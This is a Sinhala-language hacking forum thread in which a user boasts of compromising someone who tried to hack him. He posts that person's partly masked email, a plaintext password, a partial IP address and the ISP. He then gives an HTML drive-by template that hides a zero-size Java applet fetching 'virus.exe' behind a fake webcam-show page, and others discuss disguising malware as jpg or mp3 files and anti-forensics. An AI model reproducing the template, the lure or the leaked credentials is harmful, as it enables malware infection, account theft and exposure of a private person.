zbigz premium hacked account

kaotic

Member
Aug 6, 2014
1,616
482
0
Sri Lanka
අද උදේ පාන්දරම ඉන්දියන් කාරයෙක් ගේමක් දෙන්න ගිහින් හොඳට කෙලවගත්තා..මූ java drive by page එකකින් ගේමක් දෙන්න හැදුවේ.. දැනට zbigz premium එකක් විතරයි ලැබුනේ..:(

94pz.jpg

නම rajesh *******:P

email : digital...**[email protected]
Password : 38@f5s1H#

ip :
150.1*9.130.***
isp : shree it solutions.

මෙන්න උගේම guidance :rofl:

Code:
Follow the two buttons one by one as instructed. 
http://*****com/******ternalredirect.php
:rolleyes::rolleyes:

ඉස්සරට වඩා දැන් ගොඩාක් ක්‍රම වලින් වයිරස් අනම් මනම් අපේ කම්පීතර වලට රිංගනවා. ගොඩාක් ඒවා FUD
(@least 4 few days) . extension එක jpg උනත් mp3 උනත් වෙනස් කරලා ඕන විදිහකට රිංගන්න පුලුවන්..

Recommended threads to be safe

k_Zone සහෝගේ ත්‍රෙඩ්ස් බලන්න.

(not an advertisement:P)

W33R3

Well-known member
  • Jul 6, 2014
    1,781
    246
    63
    පෘතුවියේ
    Hu**tha therenna dapan me uba hack welada uba hack karalada :oo::frown:

    තේරුණ විදිහටනම් ඌ අපේ එකාට ගේම දෙන්න ගිහිල්ලා අපේ එකා ඉන්දියන් කාරයටම වැඩේ දීලා :baffled::baffled::baffled::baffled::baffled: තේරුන විදිහ හරිද මන්දා.:dull::dull::dull:
     
    kaotic

    Member
    Aug 6, 2014
    1,616
    482
    0
    Sri Lanka
    :oo: pdf wage unath virus enawada.:dull::oo::oo:
    ඔව් පුලුවන්. ඒත් බය වෙන්න එපා මම දීපු pdf වල වයිරස් නෑ රත්තරං.:lol: මම කාපු බත් පතේ පහරන එකෙක් නෙමෙයි.
     
    kaotic

    Member
    Aug 6, 2014
    1,616
    482
    0
    Sri Lanka
    Hu**tha therenna dapan me uba hack welada uba hack karalada :oo::frown:

    මම හැක් වෙලා නෑ බං. ඌ මාව හැක් කරන්න ගිහින් ඌට කෙල වෙලා:rofl::rofl:

    ඌ අඬනවා. පොඩි සාම ගිවිසුමක් ගහන්න හදන්නේ දැන්. ප්‍රතිලාභ වලින් කොටසක් එලකිරියටත් දෙනවා. please wait next thread will be awesome:rofl:

    p.s. java drive by පැහැදිලි කරන්නම්
     
    kaotic

    Member
    Aug 6, 2014
    1,616
    482
    0
    Sri Lanka

    තේරුණ විදිහටනම් ඌ අපේ එකාට ගේම දෙන්න ගිහිල්ලා අපේ එකා ඉන්දියන් කාරයටම වැඩේ දීලා :baffled::baffled::baffled::baffled::baffled: තේරුන විදිහ හරිද මන්දා.:dull::dull::dull:

    :yes::yes:
    ඔය තේරුනේ. ඌ දාපු ෆයිල් වල අනිත් පැත්තට ගිහාම උගේ ගෙදරටම යන හැටි තියෙනවා.:rofl:
    මම ත්‍රෙඩ් එකක් දාන්නම් අහු නොවෙන්න ඉන්නේ කොහොමද කියලා.
    not about vpn/vps/socks5
    it's about anti forensics:love:
     
    ~Pirate~

    Well-known member
  • Dec 24, 2012
    2,548
    996
    113
    ඔව් පුලුවන්. ඒත් බය වෙන්න එපා මම දීපු pdf වල වයිරස් නෑ රත්තරං.:lol: මම කාපු බත් පතේ පහරන එකෙක් නෙමෙයි.

    ela ela
    මම හැක් වෙලා නෑ බං. ඌ මාව හැක් කරන්න ගිහින් ඌට කෙල වෙලා:rofl::rofl:

    ඌ අඬනවා. පොඩි සාම ගිවිසුමක් ගහන්න හදන්නේ දැන්. ප්‍රතිලාභ වලින් කොටසක් එලකිරියටත් දෙනවා. please wait next thread will be awesome:rofl:

    p.s. java drive by පැහැදිලි කරන්නම්

    :oo::oo: owagen berena hati kiyala dipan ko
     
    1118lakmalkumara

    Well-known member
  • May 21, 2009
    30,468
    3,162
    113
    斯里蘭卡
    මම හැක් වෙලා නෑ බං. ඌ මාව හැක් කරන්න ගිහින් ඌට කෙල වෙලා:rofl::rofl:

    ඌ අඬනවා. පොඩි සාම ගිවිසුමක් ගහන්න හදන්නේ දැන්. ප්‍රතිලාභ වලින් කොටසක් එලකිරියටත් දෙනවා. please wait next thread will be awesome:rofl:

    p.s. java drive by පැහැදිලි කරන්නම්

    ah ela ela dapanko balanna ikmanata mchan
     
    kaotic

    Member
    Aug 6, 2014
    1,616
    482
    0
    Sri Lanka
    Java Drive by එකක් කියන්නේ

    මේකේ ගොඩාක් වෙලාවට මෙන්න මේ ෆයිල් අඩංගුයි.
    index.html
    loader
    icon
    java client file

    මම ජාවා ගැන වැඩිය දන්නේ නම් නැතෝ:rolleyes:

    උදාහරණයක් විදිහට මෙන්න මෙහෙම කියමු. ඔයාට නොමිලේ වෙබ් කැම් ෂෝ එකක් කරන්නම් කියලා ලිංක් එකක් දෙනවා. මේක e whoring වලටත් සම්බන්දයි .

    What is e whoring

    Code:
    wikipedia.org/wiki/E-Whoring
    ඊළඟට ඔයාව බිලීබාගන්නවා ජාවා ඉන්ස්ටෝල් කරන්න කියලා.

    EXAMPLE CODE -

    Code:
    <html>
    <head>
    <title> please wait....</title>
    <style type=text/css>
    body
    {
    bgcolor: black; }
    #show {
    borde: 3px;
    font-family: Verdana;
    margin-left:140px;
    margin-right:140px;
    bgcolor:grey;}
    </style>
    </head>
    <body>
    <center>
    <div id="show">
    <br>
    <img sec="webcam.png"/>
    <br>
    <pre>
    </pre>
    <img src="wait.gif"/>
    </center>
    <br>
    </body>
    </html>
    <Applet CODE = Client.class" ARCHIVE = "install.jar" WIDTH = "0" HEIGHT = "0">
    <PARAM NAME = ******* VALUE = http://blah/files/virus.exe">
    </APPLET>

    දැන් මේ ෆයිල් එක php සපෝට් කරන ෆ්රී හොස්ට් එකකට දාලා අර සයිට් එකේ අප්ලෝඩ් කරනවා. ඊලඟට ඔයාලා දැකලා ඇති ගොඩාක් වෙලාවට ජාවා ඉන්ස්ටෝල් කරන්න ඉල්ලනවා.

    java(TM) was blocked because it is out of date.

    Update plug-in

    Run this time

    කියලා buttons 2ක් එක්ක. මේ විදිහට පුලුවන් ඔයාගේ කම්පීතරේට ඔයා නොදැනුවත්වම රිංගගන්න.

    example

    Click_to_play.png

    දැන් මගෙන් ජාවා file එක ඉල්ලන්න එපෝ:no:

    visit only trusted sites:D

    Last edited:

    ruchira55

    Well-known member
  • Mar 23, 2012
    39,586
    40,139
    113
    java drive by walin karanne ape pc ekata exe ekak inject karana eka ney. ithin eken kohomada uba indian karayage zbigz premium ussanne?

    anika extension eka jpg mp3 eewain kohomada ban malware ewanne? pic.jpg.exe wage wenna athi uba kiyanne ?
     
    kaotic

    Member
    Aug 6, 2014
    1,616
    482
    0
    Sri Lanka
    java drive by walin karanne ape pc ekata exe ekak inject karana eka ney. ithin eken kohomada uba indian karayage zbigz premium ussanne?

    anika extension eka jpg mp3 eewain kohomada ban malware ewanne? pic.jpg.exe wage wenna athi uba kiyanne ?

    ඔව් මචං exe එකක් inject කරන එක තමයි කරන්නේ. ඒත් ඌ මාව කන්ටැක්ට් කරපු විදිහෙන් ip resolve කරන්න පුලුවන් උනා. jpg mp3 වගේ ඒවාගේ extension spoof කරන්න පුල්වන්. එතකොට ඒ ෆයිල් රන් කරගන්නත් පයිතන් කෑල්ලක් inject කරන්න puluwan.

    2vl8j01.jpg

    2q2e49e.jpg

    පොඩි ටූල් එකක්. මගේ නෙමෙයි.:P